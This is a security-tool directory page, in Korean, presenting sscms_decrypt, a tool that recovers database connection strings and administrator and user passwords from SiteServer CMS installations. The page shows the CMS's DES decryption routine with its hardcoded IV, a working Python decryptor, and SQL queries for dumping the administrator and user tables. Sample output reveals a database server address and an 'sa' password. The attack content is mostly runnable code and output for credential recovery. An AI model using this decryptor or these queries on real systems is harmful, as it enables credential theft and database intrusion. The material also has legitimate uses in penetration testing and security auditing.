Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
SSCMS_Decrypt — sscms database decrypt | Kitploit
도구/GitHubGitHub/jas502n/sscms_decrypt
Password CrackingEncryption/Decryption ToolsVulnerability AnalysisWeb SecurityDatabase Security
GitHubjas502n/sscms_decrypt

SSCMS_Decrypt

sscms database decrypt

저장소 보기
1034년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

sscms(siteserver cms) 데이터베이스 복호화

소개: SSCMS는 .NET Core 기반으로, 최소한의 비용과 적은 인력 투입으로 가장 짧은 시간 안에 기능이 완비되고 성능이 우수하며 규모가 크고 유지보수가 쉬운 웹사이트 플랫폼을 구축할 수 있습니다.

프로젝트 주소: https://github.com/siteserver/cms

Des 복호화

root@kitploit:~

 python3 sscms_decrypt.py
 
[+] Current Encrypt Data= 0NofLD4zWcY/jm+42NYzug==
[+] secretKey= f9c01027
[+] iv_hex= 1234567890abcdef
[+] 数据库类型:SqlServer

[+] Current Encrypt Data= B0SvIg6ExtjhllXf3vb9UwjmLKSRMlqQ1LIs6a8G0G/M1cWZ2ABJ6lvZOMlvKR+vM7/QKGc8pYo8t6sumMerqA==
[+] secretKey= f9c01027
[+] iv_hex= 1234567890abcdef
[+] 数据库配置信息:Server=192.168.77.200;Uid=sa;Pwd=p@ssw0rd2020;Database=sscms;

sscms.json

root@kitploit:~

{
  "IsNightlyUpdate": false,
  "IsProtectData": true,
  "AdminDirectory": "siteserver",
  "HomeDirectory": "home",
  "SecurityKey": "f9c01027278a387b",
  "Database": {
    "Type": "0NofLD4zWcY0slash0jm0add042NYzug0equals00equals00secret0",
    "ConnectionString": "B0SvIg6ExtjhllXf3vb9UwjmLKSRMlqQ1LIs6a8G0G0slash0M1cWZ2ABJ6lvZOMlvKR0add0vM70slash0QKGc8pYo8t6sumMerqA0equals00equals00secret0"
  },
  "Redis": {
    "ConnectionString": ""
  }
}

시스템 설치 후 SS CMS 시스템은 데이터베이스 연결 정보를 sscms.json 구성 파일에 저장합니다:

  • IsProtectData: 데이터베이스 연결 정보의 암호화 저장 여부
  • SecurityKey: 암호화 키, 시스템이 무작위로 생성
  • Database:Type: 데이터베이스 유형
  • Database:ConnectionString: 데이터베이스 연결 문자열

데이터베이스 사용자 비밀번호 테이블 복호화

프런트 사용자 테이블:

프런트 로그인 주소: http://x.x.x.x/home/pages/login.html image

SELECT * FROM jxxt.dbo.siteserver_User

백엔드 관리자 테이블

백엔드 로그인 주소: http://x.x.x.x/SiteServer/pageLogin.cshtml

image

SELECT * FROM jxxt.dbo.siteserver_Administrator

image

해당 복호화 코드:

https://github1s.com/siteserver/cms/blob/siteserver-v6.13.0/SiteServer.CMS/Provider/AdministratorDao.cs#L1126

root@kitploit:~
        private string DecodePassword(string password, EPasswordFormat passwordFormat, string passwordSalt)
        {
            var retVal = string.Empty;
            if (passwordFormat == EPasswordFormat.Clear)
            {
                retVal = password;
            }
            else if (passwordFormat == EPasswordFormat.Hashed)
            {
                throw new Exception("can not decode hashed password");
            }
            else if (passwordFormat == EPasswordFormat.Encrypted)
            {
                var encryptor = new DesEncryptor
                {
                    InputString = password,
                    DecryptKey = passwordSalt
                };
                encryptor.DesDecrypt();

                retVal = encryptor.OutString;
            }
            return retVal;
        }

DecryptKey = passwordSalt

passwordSalt를 통해 DecryptKey 값을 초기화하여 DES 복호화를 수행합니다.

root@kitploit:~
		/// 解密密钥
		/// </summary>
		public string DecryptKey
		{
			get { return _decryptKey; }
			set { _decryptKey = value; }
		}

추적 var encryptor = new DesEncryptor encryptor.DesDecrypt();

즉 DesEncryptor.DesDecrypt() 메서드를 호출합니다.

root@kitploit:~
		public void DesDecrypt()
		{
		    byte[] iv = { 0x12, 0x34, 0x56, 0x78, 0x90, 0xAB, 0xCD, 0xEF };
		    try
			{
				var byKey = Encoding.UTF8.GetBytes(_decryptKey.Substring(0, 8));
				var des = new DESCryptoServiceProvider();
				var inputByteArray = Convert.FromBase64String(_inputString);
				var ms = new MemoryStream();
				var cs = new CryptoStream(ms, des.CreateDecryptor(byKey, iv), CryptoStreamMode.Write);
				cs.Write(inputByteArray, 0, inputByteArray.Length);
				cs.FlushFinalBlock();
				Encoding encoding = new UTF8Encoding();
				_outString = encoding.GetString(ms.ToArray());
			}
			catch (Exception error)
			{
				_noteMessage = error.Message;
			}
		}

python3 코드는 다음과 같습니다:

root@kitploit:~

import base64,pyDes

def sscms_decrypt(encodeData):
    var1 = encodeData.replace("0secret0", "").replace("0add0", "+").replace("0equals0", "=").replace("0and0", "&").replace("0question0", "?").replace("0quote0", "'").replace("0slash0", "/")
    var2 = base64.b64decode(var1)
    print("[+] Current Encrypt Data= " + var1)
    secretKey = 'Y2MlWp4hGY2Wcb9tzIiR2w=='[0:8]
    print("[+] secretKey= " + secretKey)
    iv_hex = "1234567890abcdef"
    iv = bytes.fromhex(iv_hex)
    print("[+] iv_hex= " + iv_hex)
    k = pyDes.des(secretKey, pyDes.CBC, iv, pad=None, padmode=pyDes.PAD_PKCS5)
    return k.decrypt(var2) + b"\n"

Data = "VpGCBufzbT+j/zYDjDmtWw=="

print(sscms_decrypt(Data).decode("utf-8"))
도구 다운로드